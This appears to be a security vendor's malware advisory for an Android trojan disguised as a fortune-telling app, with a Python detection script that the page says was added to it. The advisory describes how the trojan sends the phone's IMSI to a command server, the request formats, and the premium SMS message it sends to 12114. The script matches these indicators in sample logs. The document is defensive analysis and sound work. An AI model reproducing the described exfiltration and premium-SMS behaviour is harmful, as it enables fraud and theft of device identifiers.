Android/MobileTx.A!tr

Analysis

Android/MobileTx.A!tr is a piece of malware targeting Android mobile phones.
The malicious package comes disguised as a Chinese fortune telling application; however, it leaks information from the victim's phone, such as the IMSI. It also sends SMS messages to a premium rate number, causing financial losses for the user.

Technical Details


The malicious application comes in packages such as com.tx.pet. The malicious package contains the following classes:
  • MainActivity: It creates the application view and starts the ValidateAsyncTask task described below. Then, every 12 seconds, it checks whether TxActivity is running and launches it if not.
  • ValidateAsyncTask: It reads the phone's IMSI and registers the phone with the attacker's server by sending a POST request to
    hxxp://[REMOVED].tx.com.cn:8081/client/xxx.xx
    with the IMSI as a parameter.
    The server responds with a group of #-separated values that are read as the uid, imsi and phonenumber, in that order.
    Next, it sends an SMS message to the premium number 12114 with the contents
    "天下#99#" + imsi + "#android#sp_jifeng"
  • TxActivity: This activity contacts the URL
    http://[REMOVED].tx.com.cn:8081/client/xxxx.xx?viewerId="+uid+"&imsi="+imsi+"&phonenum="+phonenum+"&type=15
    where the parameter values are those received in response to the previous request.
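The three behaviours above (IMSI registration over HTTP, the '#'-separated reply, and the premium SMS to 12114) are each observable from the network or device side. The following Python is an added example, not code from the original page or from Fortinet: it parses the registration reply format described above and flags the registration POST, the type=15 beacon and the premium SMS in constructed proxy and SMS log lines. The log line layout, the placeholder host label, and the sample IMSI and phone number are all assumptions made up for the example; the "[REMOVED]" part of the hostname is replaced by a placeholder since the page does not give it.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the analysis above.
C2_HOST_SUFFIX = ".tx.com.cn"       # hostname prefix is [REMOVED] on the page
C2_PORT = 8081
C2_PATH_PREFIX = "/client/"
PREMIUM_NUMBER = "12114"
SMS_BODY_RE = re.compile(r"^天下#99#(\d{14,15})#android#sp_jifeng$")
IMSI_RE = re.compile(r"^\d{14,15}$")  # IMSI is 14 or 15 decimal digits

# Constructed sample logs (not real captures). Format assumed as:
#   <timestamp> <source-ip> <method> <url> [<post-body>]
PROXY_LOG = [
    "2018-09-26T10:00:01Z 10.0.0.5 POST http://placeholder.tx.com.cn:8081/client/xxx.xx imsi=460001234567890",
    "2018-09-26T10:00:02Z 10.0.0.5 GET http://placeholder.tx.com.cn:8081/client/xxxx.xx?viewerId=42&imsi=460001234567890&phonenum=13800000000&type=15",
    "2018-09-26T10:00:03Z 10.0.0.6 GET http://example.org/index.html",
]
#   <timestamp> <source-ip> to=<number> body=<text>
SMS_LOG = [
    "2018-09-26T10:00:02Z 10.0.0.5 to=12114 body=天下#99#460001234567890#android#sp_jifeng",
    "2018-09-26T10:00:05Z 10.0.0.6 to=13900000000 body=hello",
]


def parse_c2_response(text):
    """Split the '#'-separated registration reply into uid, imsi, phonenumber."""
    fields = text.strip().split("#")
    if len(fields) < 3:
        raise ValueError("expected at least three '#'-separated fields")
    return dict(zip(("uid", "imsi", "phonenumber"), fields[:3]))


def check_http_request(method, url, body=""):
    """Return a hit dict if the request matches the C2 traffic pattern, else None."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if not (host.endswith(C2_HOST_SUFFIX) and port == C2_PORT
            and parts.path.startswith(C2_PATH_PREFIX)):
        return None
    params = parse_qs(parts.query)
    params.update(parse_qs(body))           # POST parameters travel in the body
    imsi = params.get("imsi", [None])[0]
    if imsi is None or not IMSI_RE.match(imsi):
        return None                         # /client/ request without an IMSI: not this pattern
    if method == "POST":
        stage = "register"
    elif params.get("type") == ["15"]:
        stage = "beacon"
    else:
        stage = "other"
    return {
        "stage": stage,
        "host": host,
        "imsi": imsi,
        "uid": params.get("viewerId", [None])[0],
        "phonenum": params.get("phonenum", [None])[0],
    }


def check_sms(to_number, body):
    """Return a hit dict if an outgoing SMS matches the premium-number pattern."""
    if to_number != PREMIUM_NUMBER:
        return None
    match = SMS_BODY_RE.match(body)
    if not match:
        return None
    return {"stage": "premium_sms", "to": to_number, "imsi": match.group(1)}


def scan_logs(proxy_lines, sms_lines):
    """Run both checks over the sample logs and collect hits in log order."""
    hits = []
    for line in proxy_lines:
        ts, src, method, url, *rest = line.split(" ")
        hit = check_http_request(method, url, rest[0] if rest else "")
        if hit:
            hits.append({"ts": ts, "src": src, **hit})
    for line in sms_lines:
        ts, src, to_field, body_field = line.split(" ", 3)
        hit = check_sms(to_field[len("to="):], body_field[len("body="):])
        if hit:
            hits.append({"ts": ts, "src": src, **hit})
    return hits


if __name__ == "__main__":
    for hit in scan_logs(PROXY_LOG, SMS_LOG):
        print(hit)
```

Matching on the host suffix, port and /client/ path together with an IMSI-shaped parameter keeps the HTTP rule from firing on unrelated traffic to the same domain, and the SMS rule keys on the fixed "天下#99#...#android#sp_jifeng" body rather than on the short code alone, since legitimate services may also use 12114.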

Recommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry

Detection Availability

Product Level
FortiGate Extended
FortiClient Extreme
FortiAPS
FortiAPU
FortiMail Extreme
FortiSandbox Extreme
FortiWeb Extreme
Web Application Firewall Extreme
FortiIsolator Extreme
FortiDeceptor Extreme
FortiEDR

Version Updates

Date Version Detail
2018-09-26 62.48200